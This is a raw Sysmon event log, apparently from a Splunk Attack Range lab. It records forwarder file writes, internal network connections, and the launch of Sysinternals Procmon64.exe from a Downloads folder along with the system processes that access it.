23542300x8000000000000000288662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:52.785{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D004068C16630B4DB52BD4C2BE9BCAEE,SHA256=EC0239D3739CAE9EC3BAC0F08E2928552E3AE27B1AB91FEE160433BB810209D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:52.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36FC3DD8BF8977A30E696EF237079038,SHA256=4F5DA9C3CD298BCC6F20BC702408464DE12E43C7B9A8096B2F48EF70A1785A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:49.609{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53490-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:52.529{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51A6BAC6FCFAA293B998D0680849DB81,SHA256=467F87ED0CCA06BB07F34DA5A390BDB5E5442D26089C57726E2750D252B5B4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:53.807{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1C9BF60F2F173A4A96787E44CD0A430,SHA256=F700EFBB2B827285D25C9F12DA8BEFD452701C4A1D780A60E0131CAD3761E0E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:54.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C1CCD4562FE7120204A10280A2B1A2,SHA256=7B535060EC9C3DCB39AF095A682687E62AA8B1523B97A1F025BFF91A3956AB0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.676{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51354-false10.0.1.12-8000- 23542300x8000000000000000216881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:54.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD6CB00F6B4C6010B17474ED9A623C14,SHA256=A11CDC79EF4C52F30FDE8D84DDCF72D4E085A7052D76683BDC2998B8B1F7E802,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.896{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:55.154{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F66778841EF470B040C721E42BD7BA7F,SHA256=2707548C2F4261B7D22E4DE2534976B6F5A8C8C6194CF91DAB157FB1932E4CD4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.801{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.799{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.798{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.796{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.795{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.795{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.793{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.777{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.773{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.762{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.762{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.760{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.760{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.737{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.737{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.642{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000288675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBSetValue2022-02-23 10:51:55.641{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\Procmon64.exeBinary Data 10341000x8000000000000000288674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.632{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.631{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.628{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.628{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.628{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.628{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.628{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.627{C8EA50B7-F2AD-6215-C000-000000003802}4856996C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a90ff|C:\Windows\System32\windows.storage.dll+a8d75|C:\Windows\System32\windows.storage.dll+a8866|C:\Windows\System32\windows.storage.dll+a9cd8|C:\Windows\System32\windows.storage.dll+a868e|C:\Windows\System32\windows.storage.dll+ab4a5|C:\Windows\System32\windows.storage.dll+ab824|C:\Windows\System32\windows.storage.dll+aae60|C:\Windows\System32\windows.storage.dll+ad68a|C:\Windows\System32\windows.storage.dll+ad442|C:\Windows\System32\SHELL32.dll+3fa6d|C:\Windows\System32\SHELL32.dll+3e606|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+18cf1c|C:\Windows\System32\SHELL32.dll+18cc73|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.588{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe3.89Process MonitorSysinternals ProcmonSysinternals - www.sysinternals.comProcess Monitor"C:\Users\Administrator\Downloads\Procmon64.exe" 